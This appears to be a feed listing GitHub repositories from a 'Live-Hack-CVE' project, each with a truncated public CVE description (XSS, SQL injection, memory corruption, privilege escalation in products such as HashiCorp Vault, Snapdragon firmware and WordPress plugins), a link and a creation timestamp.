**Potential security vulnerabilities including compromise of integrity, and allowed communication with untrusted clients has been identified in HP Support Assistant software. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6918](https://github.com/Live-Hack-CVE/CVE-2020-6918) create time: 2022-12-29T21:40:41Z

**There is an arbitrary file upload vulnerability in FeehiCMS 2.0.8 at the head image upload, that allows attackers to execute relevant PHP code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21516](https://github.com/Live-Hack-CVE/CVE-2020-21516) create time: 2022-12-29T21:39:35Z

**Due to insufficient validation of ELF headers, an Incorrect Calculation of Buffer Size can occur in Boot leading to memory corruption in Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35134](https://github.com/Live-Hack-CVE/CVE-2021-35134) create time: 2022-12-29T21:45:30Z

**A null pointer dereference may potentially occur during RSA key import in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35135](https://github.com/Live-Hack-CVE/CVE-2021-35135) create time: 2022-12-29T21:44:28Z

**Out of bound write in DSP service due to improper bound check for response buffer size in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35132](https://github.com/Live-Hack-CVE/CVE-2021-35132) create time: 2022-12-29T21:44:24Z

**wolfSSL through 5.0.0 allows an attacker to cause a denial of service and infinite loop in the client component by sending crafted traffic from a Machine-in-the-Middle (MITM) position. The root cause is that the client module accepts TLS messages that normally are only sent to TLS servers. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44718](https://github.com/Live-Hack-CVE/CVE-2021-44718) create time: 2022-12-29T21:44:21Z

**Possible authentication bypass due to improper order of signature verification and hashing in the signature verification call in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35113](https://github.com/Live-Hack-CVE/CVE-2021-35113) create time: 2022-12-29T21:44:17Z

**Non-secure region can try modifying RG permissions of IO space xPUs due to improper input validation in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35122](https://github.com/Live-Hack-CVE/CVE-2021-35122) create time: 2022-12-29T21:44:10Z

**Possible authentication bypass due to improper order of signature verification and hashing in the signature verification call in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35097](https://github.com/Live-Hack-CVE/CVE-2021-35097) create time: 2022-12-29T21:44:06Z

**Improper checking of AP-S lock bit while verifying the secure resource group permissions can lead to non secure read and write access in Snapdragon Connectivity, Snapdragon Mobile CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35108](https://github.com/Live-Hack-CVE/CVE-2021-35108) create time: 2022-12-29T21:43:56Z

**Possible address manipulation from APP-NS while APP-S is configuring an RG where it tries to merge the address ranges in Snapdragon Connectivity, Snapdragon Mobile CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35109](https://github.com/Live-Hack-CVE/CVE-2021-35109) create time: 2022-12-29T21:43:32Z

**An improper neutralization of input during web page generation vulnerability [CWE-79] in FortiOS version 7.2.0, version 6.4.0 through 6.4.9, version 7.0.0 through 7.0.5 may allow an authenticated attacker to perform a stored cross site scripting (XSS) attack through the URI parameter via the Threat Feed IP address sect CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43080](https://github.com/Live-Hack-CVE/CVE-2021-43080) create time: 2022-12-29T21:43:21Z

**HashiCorp Vault and Vault Enterprise’s UI erroneously cached and exposed user-viewed secrets between sessions in a single shared browser. Fixed in 1.8.0 and pending 1.7.4 / 1.6.6 releases. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38554](https://github.com/Live-Hack-CVE/CVE-2021-38554) create time: 2022-12-29T21:41:01Z

**HashiCorp Vault and Vault Enterprise 0.11.0 up to 1.7.5 and 1.8.4 templated ACL policies would always match the first-created entity alias if multiple entity aliases exist for a specified entity and mount combination, potentially resulting in incorrect policy enforcement. Fixed in Vault and Vault Enterprise 1.7.6, 1.8. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43998](https://github.com/Live-Hack-CVE/CVE-2021-43998) create time: 2022-12-29T21:40:38Z

**In HashiCorp Vault and Vault Enterprise before 1.7.7, 1.8.x before 1.8.6, and 1.9.x before 1.9.1, clusters using the Integrated Storage backend allowed an authenticated user (with write permissions to a kv secrets engine) to cause a panic and denial of service of the storage backend. The earliest affected version is 1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45042](https://github.com/Live-Hack-CVE/CVE-2021-45042) create time: 2022-12-29T21:40:34Z

**HashiCorp Vault Enterprise 0.9.2 through 1.6.2 allowed the read of license metadata from DR secondaries without authentication. Fixed in 1.6.3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27668](https://github.com/Live-Hack-CVE/CVE-2021-27668) create time: 2022-12-29T21:40:31Z

**HashiCorp Consul and Consul Enterprise 1.10.1 Raft RPC layer allows non-server agents with a valid certificate signed by the same CA to access server-only functionality, enabling privilege escalation. Fixed in 1.8.15, 1.9.9 and 1.10.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37219](https://github.com/Live-Hack-CVE/CVE-2021-37219) create time: 2022-12-29T21:40:27Z

**HashiCorp Vault and Vault Enterprise through 1.7.4 and 1.8.3 allowed a user with write permission to an entity alias ID sharing a mount accessor with another user to acquire this other user’s policies by merging their identities. Fixed in Vault and Vault Enterprise 1.7.5 and 1.8.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41802](https://github.com/Live-Hack-CVE/CVE-2021-41802) create time: 2022-12-29T21:40:24Z

**Go before 1.16.9 and 1.17.x before 1.17.2 has a Buffer Overflow via large arguments in a function invocation from a WASM module, when GOARCH=wasm GOOS=js is used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38297](https://github.com/Live-Hack-CVE/CVE-2021-38297) create time: 2022-12-29T21:39:59Z

**The x/crypto/ssh package before 0.0.0-20211202192323-5770296d904e of golang.org/x/crypto allows an attacker to panic an SSH server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43565](https://github.com/Live-Hack-CVE/CVE-2021-43565) create time: 2022-12-29T21:37:39Z

**Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in MyThemeShop Launcher: Coming Soon & Maintenance Mode plugin <= 1.0.11 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36829](https://github.com/Live-Hack-CVE/CVE-2021-36829) create time: 2022-12-29T21:37:34Z

**A stored cross-site scripting (XSS) vulnerability in /client.php of Garage Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36639](https://github.com/Live-Hack-CVE/CVE-2022-36639) create time: 2022-12-29T21:46:51Z

**An access control issue in the component print.php of Garage Management System v1.0 allows unauthenticated attackers to access data for all existing orders. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36638](https://github.com/Live-Hack-CVE/CVE-2022-36638) create time: 2022-12-29T21:46:48Z

**Databasir is a database metadata management platform. Databasir <= 1.06 has Server-Side Request Forgery (SSRF) vulnerability. The SSRF is triggered by a sending a **single** HTTP POST request to create a databaseType. By supplying a `jdbcDriverFileUrl` that returns a non `200` response code, the url is executed, the re CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31196](https://github.com/Live-Hack-CVE/CVE-2022-31196) create time: 2022-12-29T21:46:44Z

**This package is a PrestaShop module that allows users to post reviews and rate products. There is a vulnerability where the attacker could steal an administrator's cookie. The issue is fixed in version 5.0.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35933](https://github.com/Live-Hack-CVE/CVE-2022-35933) create time: 2022-12-29T21:46:41Z

**There is a NULL pointer dereference in aes256_encrypt in Samsung mTower through 0.3.0 due to a missing check on the return value of EVP_CIPHER_CTX_new. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39829](https://github.com/Live-Hack-CVE/CVE-2022-39829) create time: 2022-12-29T21:46:37Z

**The Visual Portfolio, Photo Gallery & Post Grid WordPress plugin before 2.18.0 does not have proper authorisation checks in some of its REST endpoints, allowing unauthenticated users to call them and inject arbitrary CSS in arbitrary saved layouts CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2543](https://github.com/Live-Hack-CVE/CVE-2022-2543) create time: 2022-12-29T21:46:34Z

**The Fast Flow WordPress plugin before 1.2.13 does not sanitise and escape some of its Widget settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2775](https://github.com/Live-Hack-CVE/CVE-2022-2775) create time: 2022-12-29T21:46:30Z

**The Simple Payment Donations & Subscriptions WordPress plugin before 4.2.1 does not sanitise and escape user input given in its forms, which could allow unauthenticated attackers to perform Cross-Site Scripting attacks against admins CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2565](https://github.com/Live-Hack-CVE/CVE-2022-2565) create time: 2022-12-29T21:46:26Z

**The Directorist WordPress plugin before 7.3.1 discloses the email address of all users in an AJAX action available to both unauthenticated and any authenticated users CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2376](https://github.com/Live-Hack-CVE/CVE-2022-2376) create time: 2022-12-29T21:46:22Z

**sign_pFwInfo in Samsung mTower through 0.3.0 has a missing check on the return value of EC_KEY_set_public_key_affine_coordinates, leading to a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39830](https://github.com/Live-Hack-CVE/CVE-2022-39830) create time: 2022-12-29T21:46:19Z

**sign_pFwInfo in Samsung mTower through 0.3.0 has a missing check on the return value of EC_KEY_set_private_key, leading to a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39828](https://github.com/Live-Hack-CVE/CVE-2022-39828) create time: 2022-12-29T21:46:16Z

**Cross-site Scripting (XSS) - Stored in GitHub repository jgraph/drawio prior to 20.2.8. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3127](https://github.com/Live-Hack-CVE/CVE-2022-3127) create time: 2022-12-29T21:46:12Z

**Cotonti Siena 0.9.20 allows admins to conduct stored XSS attacks via a forum post. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39839](https://github.com/Live-Hack-CVE/CVE-2022-39839) create time: 2022-12-29T21:46:09Z

**Cotonti Siena 0.9.20 allows admins to conduct stored XSS attacks via a direct message (DM). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39840](https://github.com/Live-Hack-CVE/CVE-2022-39840) create time: 2022-12-29T21:46:05Z

**A vulnerability was found in SourceCodester Online Employee Leave Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/addemployee.php. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The iden CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3121](https://github.com/Live-Hack-CVE/CVE-2022-3121) create time: 2022-12-29T21:46:02Z

**A vulnerability classified as critical was found in SourceCodester Clinics Patient Management System. Affected by this vulnerability is an unknown functionality of the file index.php of the component Login. The manipulation of the argument user_name leads to sql injection. The attack can be launched remotely. The explo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3120](https://github.com/Live-Hack-CVE/CVE-2022-3120) create time: 2022-12-29T21:45:58Z

**The Solr plugin of Apache OFBiz is configured by default to automatically make a RMI request on localhost, port 1099. In version 18.12.05 and earlier, by hosting a malicious RMI server on localhost, an attacker may exploit this behavior, at server start-up or on a server restart, in order to run arbitrary code. Upgrade CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29063](https://github.com/Live-Hack-CVE/CVE-2022-29063) create time: 2022-12-29T21:45:55Z

**Dell PowerScale OneFS, versions 9.0.0 up to and including 9.1.0.20, 9.2.1.13, 9.3.0.6, and 9.4.0.3 , contain an insertion of sensitive information in log files vulnerability. A remote unprivileged attacker could potentially exploit this vulnerability, leading to exposure of this sensitive data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34369](https://github.com/Live-Hack-CVE/CVE-2022-34369) create time: 2022-12-29T21:45:51Z

**Dell PowerScale OneFS, versions 9.0.0 up to and including 9.1.0.19, 9.2.1.12, 9.3.0.6, and 9.4.0.3, contain an unprotected transport of credentials vulnerability. A malicious unprivileged network attacker could potentially exploit this vulnerability, leading to full system compromise. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34371](https://github.com/Live-Hack-CVE/CVE-2022-34371) create time: 2022-12-29T21:45:48Z

**Dell PowerScale OneFS, versions 9.0.0 up to and including 9.1.0.20, 9.2.1.13, 9.3.0.6, and 9.4.0.3, contain a relative path traversal vulnerability. A low privileged local attacker could potentially exploit this vulnerability, leading to denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34378](https://github.com/Live-Hack-CVE/CVE-2022-34378) create time: 2022-12-29T21:45:44Z

**Dell Command Update, Dell Update and Alienware Update versions prior to 4.6.0 contains a Local Privilege Escalation Vulnerability in the custom catalog configuration. A local malicious user may potentially exploit this vulnerability in order to elevate their privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34382](https://github.com/Live-Hack-CVE/CVE-2022-34382) create time: 2022-12-29T21:45:41Z

**A flaw was found in the Linux kernel in net/netfilter/nf_tables_core.c:nft_do_chain, which can cause a use-after-free. This issue needs to handle 'return' with proper preconditions, as it can lead to a kernel information leak problem caused by a local, unprivileged attacker. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1016](https://github.com/Live-Hack-CVE/CVE-2022-1016) create time: 2022-12-29T21:45:37Z

**The Eclipse TCF debug interface in JasMiner-X4-Server-20220621-090907 and below is open on port 1534. This issue allows unauthenticated attackers to gain root privileges on the affected device and access sensitive data or execute arbitrary commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36601](https://github.com/Live-Hack-CVE/CVE-2022-36601) create time: 2022-12-29T21:45:34Z

**Zulip is an open-source team collaboration tool with topic-based threading that combines email and chat. When displaying messages with embedded remote images, Zulip normally loads the image preview via a go-camo proxy server. However, an attacker who can send messages could include a crafted URL that tricks the server CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36048](https://github.com/Live-Hack-CVE/CVE-2022-36048) create time: 2022-12-29T21:45:07Z

**A stack-based buffer overflow flaw was found in the Fribidi package. This flaw allows an attacker to pass a specially crafted file to the Fribidi application, which leads to a possible memory leak or a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25308](https://github.com/Live-Hack-CVE/CVE-2022-25308) create time: 2022-12-29T21:45:04Z

**A format string vulnerability in Zyxel NAS326 firmware versions prior to V5.21(AAZF.12)C0 could allow an attacker to achieve unauthorized remote code execution via a crafted UDP packet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34747](https://github.com/Live-Hack-CVE/CVE-2022-34747) create time: 2022-12-29T21:45:00Z

**The Netic User Export add-on before 2.0.6 for Atlassian Jira does not perform authorization checks. This might allow an unauthenticated user to export all users from Jira by making an HTTP request to the affected endpoint. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38367](https://github.com/Live-Hack-CVE/CVE-2022-38367) create time: 2022-12-29T21:44:56Z

**The WP Database Backup WordPress plugin before 5.9 does not escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks when the unfiltered_html capability is disallowed (for example in multisite setup) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2271](https://github.com/Live-Hack-CVE/CVE-2022-2271) create time: 2022-12-29T21:44:53Z

**Helm is a tool for managing Charts. Charts are packages of pre-configured Kubernetes resources. Fuzz testing, provided by the CNCF, identified input to functions in the _strvals_ package that can cause an out of memory panic. The _strvals_ package contains a parser that turns strings in to Go structures. The _strvals_ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36055](https://github.com/Live-Hack-CVE/CVE-2022-36055) create time: 2022-12-29T21:44:49Z

**In OpenShift Container Platform, a user with permissions to create or modify Routes can craft a payload that inserts a malformed entry into one of the cluster router's HAProxy configuration files. This malformed entry can match any arbitrary hostname, or all hostnames in the cluster, and direct traffic to an arbitrary CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1677](https://github.com/Live-Hack-CVE/CVE-2022-1677) create time: 2022-12-29T21:44:46Z

**In atf (hwfde), there is a possible leak of sensitive information due to incorrect error handling. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS06171729; Issue ID: ALPS06171729. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20066](https://github.com/Live-Hack-CVE/CVE-2022-20066) create time: 2022-12-29T21:00:55Z

**An exploitable SQL injection vulnerability exists in the authenticated portion of YouPHPTube 7.6. Specially crafted web requests can cause SQL injections. An attacker can send a web request with parameters containing SQL injection attacks to trigger this vulnerability, potentially allowing exfiltration of the database, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5114](https://github.com/Live-Hack-CVE/CVE-2019-5114) create time: 2022-12-29T20:55:20Z

**A vulnerability was found in Hibernate-Validator. The SafeHtml validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions. This vulnerability can result in an XSS attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10219](https://github.com/Live-Hack-CVE/CVE-2019-10219) create time: 2022-12-29T20:19:54Z

**A vulnerability was found in the Linux kernel, where accessing a deallocated instance in printer_ioctl() printer_ioctl() tries to access of a printer_dev instance. However, use-after-free arises because it had been freed by gprinter_free(). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27784](https://github.com/Live-Hack-CVE/CVE-2020-27784) create time: 2022-12-29T21:04:36Z

**Using a specially-crafted message, an attacker may potentially cause a BIND server to reach an inconsistent state if the attacker knows (or successfully guesses) the name of a TSIG key used by the server. Since BIND, by default, configures a local session key even on servers whose configuration does not otherwise make CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8617](https://github.com/Live-Hack-CVE/CVE-2020-8617) create time: 2022-12-29T20:59:34Z

**In nDPI through 3.2, the Oracle protocol dissector has a heap-based buffer over-read in ndpi_search_oracle in lib/protocols/oracle.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15476](https://github.com/Live-Hack-CVE/CVE-2020-15476) create time: 2022-12-29T20:57:46Z

**In nDPI through 3.2, the H.323 dissector is vulnerable to a heap-based buffer over-read in ndpi_search_h323 in lib/protocols/h323.c, as demonstrated by a payload packet length that is too short. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15472](https://github.com/Live-Hack-CVE/CVE-2020-15472) create time: 2022-12-29T20:57:39Z

**Cross Site Scripting (XSS) in xiunobbs 4.0.4 allows remote attackers to execute arbitrary web script or HTML via the attachment upload function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19914](https://github.com/Live-Hack-CVE/CVE-2020-19914) create time: 2022-12-29T20:57:28Z

**In KDE Ark before 20.08.1, a crafted TAR archive with symlinks can install files outside the extraction directory, as demonstrated by a write operation to a user's home directory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24654](https://github.com/Live-Hack-CVE/CVE-2020-24654) create time: 2022-12-29T20:20:20Z

**In kerfuffle/jobs.cpp in KDE Ark before 20.08.0, a crafted archive can install files outside the extraction directory via ../ directory traversal. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16116](https://github.com/Live-Hack-CVE/CVE-2020-16116) create time: 2022-12-29T20:20:16Z

**A cross-site scripting (XSS) vulnerability in the HTML Data Processor for CKEditor 4.0 before 4.14 allows remote attackers to inject arbitrary web script through a crafted "protected" comment (with the cke_protected syntax). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9281](https://github.com/Live-Hack-CVE/CVE-2020-9281) create time: 2022-12-29T20:19:48Z

**A privileged attacker in GeoNetwork before 3.12.0 and 4.x before 4.0.4 can use the directory harvester before-script to execute arbitrary OS commands remotely on the hosting infrastructure. A User Administrator or Administrator account is required to perform this. This occurs in the runBeforeScript method in harvesters CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28398](https://github.com/Live-Hack-CVE/CVE-2021-28398) create time: 2022-12-29T21:05:28Z

**Wondershare Dr. Fone Latest version as of 2021-12-06 is vulnerable to Incorrect Access Control. A normal user can send manually crafted packets to the ElevationService.exe and execute arbitrary code without any validation with SYSTEM privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44595](https://github.com/Live-Hack-CVE/CVE-2021-44595) create time: 2022-12-29T21:04:54Z

**Wondershare LTD Dr. Fone as of 2021-12-06 version is affected by Remote code execution. Due to software design flaws an unauthenticated user can communicate over UDP with the "InstallAssistService.exe" service(the service is running under SYSTEM privileges) and manipulate it to execute malicious executable without any CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44596](https://github.com/Live-Hack-CVE/CVE-2021-44596) create time: 2022-12-29T21:04:50Z

**An out of bounds read was found in Wavpack 5.4.0 in processing *.WAV files. This issue triggered in function WavpackPackSamples of file src/pack_utils.c, tainted variable cnt is too large, that makes pointer sptr read beyond heap bound. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44269](https://github.com/Live-Hack-CVE/CVE-2021-44269) create time: 2022-12-29T21:04:12Z

**Go before 1.16.10 and 1.17.x before 1.17.3 allows an archive/zip Reader.Open panic via a crafted ZIP archive containing an invalid name or an empty filename field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41772](https://github.com/Live-Hack-CVE/CVE-2021-41772) create time: 2022-12-29T21:01:48Z

**DLink DIR850 ET850-1.08TRb03 is affected by an incorrect access control vulnerability through URL redirection to untrusted site. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46379](https://github.com/Live-Hack-CVE/CVE-2021-46379) create time: 2022-12-29T21:01:15Z

**DLink DIR850 ET850-1.08TRb03 is affected by an incorrect access control vulnerability through an unauthenticated remote configuration download. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46378](https://github.com/Live-Hack-CVE/CVE-2021-46378) create time: 2022-12-29T21:01:10Z

**An SQL Injection vulnerability exists in Webtareas 2.4p3 and earlier via the $uq HTTP POST parameter in editapprovalstage.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43481](https://github.com/Live-Hack-CVE/CVE-2021-43481) create time: 2022-12-29T21:00:11Z

**Nullptr dereference when a null char is present in a proto symbol. The symbol is parsed incorrectly, leading to an unchecked call into the proto file's name during generation of the resulting error message. Since the symbol is incorrectly parsed, the file is nullptr. We recommend upgrading to version 3.15.0 or greater. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22570](https://github.com/Live-Hack-CVE/CVE-2021-22570) create time: 2022-12-29T20:59:31Z

**In Ericsson Network Manager (ENM) releases before 21.2, users belonging to the same AMOS authorization group can retrieve the data from certain log files. All AMOS users are considered to be highly privileged users in ENM system and all must be previously defined and authorized by the Security Administrator. Those user CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32570](https://github.com/Live-Hack-CVE/CVE-2021-32570) create time: 2022-12-29T20:59:17Z

**An issue was discovered in YSoft SAFEQ 6 before 6.0.72. Incorrect privileges were configured as part of the installer package for the Client V3 services, allowing for local user privilege escalation by overwriting the executable file via an alternative data stream. NOTE: this is not the same as CVE-2021-31859. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38176](https://github.com/Live-Hack-CVE/CVE-2022-38176) create time: 2022-12-29T20:58:59Z

**deep.assign npm package 0.0.0-alpha.0 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution'). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40663](https://github.com/Live-Hack-CVE/CVE-2021-40663) create time: 2022-12-29T20:58:27Z

**spree_auth_devise is an open source library which provides authentication and authorization services for use with the Spree storefront framework by using an underlying Devise authentication framework. In affected versions spree_auth_devise is subject to a CSRF vulnerability that allows user account takeover. All applic CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41275](https://github.com/Live-Hack-CVE/CVE-2021-41275) create time: 2022-12-29T20:57:11Z

**A Cleartext Storage of Sensitive Information vulnerability in SUSE Rancher allows authenticated Cluster Owners, Cluster Members, Project Owners, Project Members and User Base to use the Kubernetes API to retrieve plaintext version of sensitive data. This issue affects: SUSE Rancher Rancher versions prior to 2.5.16; Ran CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36782](https://github.com/Live-Hack-CVE/CVE-2021-36782) create time: 2022-12-29T20:57:07Z

**Zoho ManageEngine Network Configuration Manager before ??125465 is vulnerable to SQL Injection in a configuration search. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41081](https://github.com/Live-Hack-CVE/CVE-2021-41081) create time: 2022-12-29T20:57:03Z

**Insufficient DRAM address validation in System Management Unit (SMU) may result in a DMA read from invalid DRAM address to SRAM resulting in SMU not servicing further requests. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26337](https://github.com/Live-Hack-CVE/CVE-2021-26337) create time: 2022-12-29T20:56:59Z

**Aim is an open-source, self-hosted machine learning experiment tracking tool. Versions of Aim prior to 3.1.0 are vulnerable to a path traversal attack. By manipulating variables that reference files with “dot-dot-slash (../)� sequences and its variations or by using absolute file paths, it may be possible to access CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43775](https://github.com/Live-Hack-CVE/CVE-2021-43775) create time: 2022-12-29T20:56:56Z

**Zoho ManageEngine Network Configuration Manager before ??125465 is vulnerable to SQL Injection in a hardware details search. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41080](https://github.com/Live-Hack-CVE/CVE-2021-41080) create time: 2022-12-29T20:56:52Z

**Composer is an open source dependency manager for the PHP language. In affected versions windows users running Composer to install untrusted dependencies are subject to command injection and should upgrade their composer version. Other OSs and WSL are not affected. The issue has been resolved in composer versions 1.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41116](https://github.com/Live-Hack-CVE/CVE-2021-41116) create time: 2022-12-29T20:56:49Z

**Zulip is an open source team chat server. In affected versions Zulip allows organization administrators on a server to configure "linkifiers" that automatically create links from messages that users send, detected via arbitrary regular expressions. Malicious organization administrators could subject the server to a den CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41115](https://github.com/Live-Hack-CVE/CVE-2021-41115) create time: 2022-12-29T20:56:17Z

**UltraJSON (aka ujson) through 5.1.0 has a stack-based buffer overflow in Buffer_AppendIndentUnchecked (called from encode). Exploitation can, for example, use a large amount of indentation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45958](https://github.com/Live-Hack-CVE/CVE-2021-45958) create time: 2022-12-29T20:56:13Z

**CGI::Cookie.parse in Ruby through 2.6.8 mishandles security prefixes in cookie names. This also affects the CGI gem through 0.3.0 for Ruby. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41819](https://github.com/Live-Hack-CVE/CVE-2021-41819) create time: 2022-12-29T20:56:09Z

**Date.parse in the date gem through 3.2.0 for Ruby allows ReDoS (regular expression Denial of Service) via a long string. The fixed versions are 3.2.1, 3.1.2, 3.0.2, and 2.0.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41817](https://github.com/Live-Hack-CVE/CVE-2021-41817) create time: 2022-12-29T20:56:06Z

**Telenot CompasX versions prior to 32.0 use a weak seed for random number generation leading to predictable AES keys used in the NFC tags used for local authorization of users. This may lead to total loss of trustworthiness of the installation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34600](https://github.com/Live-Hack-CVE/CVE-2021-34600) create time: 2022-12-29T20:56:02Z

**MariaDB through 10.5.9 allows an application crash via certain long SELECT DISTINCT statements that improperly interact with storage-engine resource limitations for temporary data structures. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46668](https://github.com/Live-Hack-CVE/CVE-2021-46668) create time: 2022-12-29T20:55:58Z

**MariaDB through 10.5.9 allows a sql_parse.cc application crash because of incorrect used_tables expectations. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46665](https://github.com/Live-Hack-CVE/CVE-2021-46665) create time: 2022-12-29T20:55:55Z

**CGI.escape_html in Ruby before 2.7.5 and 3.x before 3.0.3 has an integer overflow and resultant buffer overflow via a long string on platforms (such as Windows) where size_t and long have different numbers of bytes. This also affects the CGI gem before 0.3.1 for Ruby. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41816](https://github.com/Live-Hack-CVE/CVE-2021-41816) create time: 2022-12-29T20:55:48Z

